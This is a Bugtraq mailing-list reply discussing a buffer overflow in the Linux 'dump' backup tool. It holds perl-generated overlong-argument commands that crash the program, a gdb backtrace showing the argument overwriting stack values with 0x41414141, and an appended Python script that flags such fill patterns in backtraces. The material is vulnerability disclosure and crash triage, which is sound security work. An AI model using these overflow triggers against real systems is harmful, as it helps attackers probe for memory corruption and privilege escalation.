Bugtraq mailing list archives
Re: [ Hackerslab bug_paper ] Linux dump buffer overflow
From: super () UDEL EDU (Derek Callaway)
Date: Wed, 1 Mar 2000 09:58:16 -0500
On Mon, 28 Feb 2000, 김용준 KimYongJun (99졸업) wrote:
[ Hackerslab bug_paper ] Linux dump buffer overflow
<snip>
[loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "x" x 556'`
DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000
DUMP: Date of last level dump: the epoch
DUMP: Dumping xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: 파일 이름이 너무 깁니다 while opening filesystem
DUMP: SIGSEGV: ABORTING!
Segmentation fault
<snip>

Could this be a problem with glibc, as well?

[super@white dump]$ pwd
/usr/src/redhat/SOURCES/dump-0.4b4/dump
[super@white dump]$ echo -e "ru -0 `perl -e 'print "A"x5000;'`\nbt" | gdb dump
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) Starting program: /usr/src/redhat/SOURCES/dump-0.4b4/dump/dump -0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<snipped long string>
---Type <return> to continue, or q <return> to quit---Program received signal SIGSEGV, Segmentation fault.
getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
88 ../sysdeps/generic/getenv.c: No such file or directory.
(gdb) #0 getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
#1 0x400b3f4a in tzset_internal (always=1094795585) at tzset.c:144
#2 0x400b4ceb in __tz_convert (timer=0xbfffd790, use_localtime=1, tp=0x4011e4e0) at tzset.c:575
#3 0x400b08bc in localtime (t=0xbfffd790) at localtime.c:43
#4 0x400b07f8 in ctime (t=0xbfffd790) at ctime.c:32
#5 0x804adde in main (argc=1094795585, argv=0x41414141) at main.c:355
(gdb) [super@white dump]$

From this gdb session, it appears that there _could_ be a problem with
the way that glibc's time functions behave.

--
/* Derek Callaway <super () udel edu> char *sites[]={"http://www.geekwise.com",
   Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc",
   (302) 837-8769 "http://www.homeworkhelp.org",0}; S@IRC */
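
A triage check for the backtrace above, as an added example that is not part of the original message: it scans gdb frame arguments for 32-bit values made of one repeated byte, which is how the "A" fill from the command line shows up in the decimal value 1094795585 (0x41414141). The function names and the 4-byte word size are assumptions of this example.

```python
import re

# Backtrace lines copied from the gdb session in the message above.
BACKTRACE = """\
#0 getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
#1 0x400b3f4a in tzset_internal (always=1094795585) at tzset.c:144
#2 0x400b4ceb in __tz_convert (timer=0xbfffd790, use_localtime=1, tp=0x4011e4e0) at tzset.c:575
#3 0x400b08bc in localtime (t=0xbfffd790) at localtime.c:43
#4 0x400b07f8 in ctime (t=0xbfffd790) at ctime.c:32
#5 0x804adde in main (argc=1094795585, argv=0x41414141) at main.c:355
"""

# "#N [0xADDR in ]function (args) at file:line"
FRAME_RE = re.compile(r"^#(\d+)\s+(?:0x[0-9a-f]+ in )?(\w+) \((.*)\) at ")
# name=value pairs where the value is hex or decimal
ARG_RE = re.compile(r"(\w+)=(0x[0-9a-fA-F]+|\d+)")


def fill_byte(value, width=4):
    """Return the byte if `value` is that byte repeated `width` times, else None."""
    raw = value.to_bytes(width, "little")
    b = raw[0]
    # 0x00000000 and 0xffffffff occur naturally, so they are not treated as fill.
    if b not in (0x00, 0xFF) and raw == bytes([b]) * width:
        return b
    return None


def tainted_frames(backtrace, width=4):
    """Return (frame_no, function, arg_name, fill_char) for fill-pattern arguments."""
    hits = []
    for line in backtrace.splitlines():
        m = FRAME_RE.match(line)
        if not m:
            continue
        frame_no, func, args = int(m.group(1)), m.group(2), m.group(3)
        for name, text in ARG_RE.findall(args):
            value = int(text, 0)  # base 0 accepts both 0x... and decimal
            if value >= 1 << (8 * width):
                continue  # wider than one machine word, skip
            b = fill_byte(value, width)
            if b is not None:
                hits.append((frame_no, func, name, chr(b)))
    return hits


if __name__ == "__main__":
    for frame_no, func, name, ch in tainted_frames(BACKTRACE):
        print(f"frame #{frame_no} {func}: {name} is the byte {ch!r} repeated")
```

Frames whose saved arguments carry the fill byte have had their stack slots overwritten, so the function at the top of the backtrace is where the damage was noticed rather than necessarily where it was done.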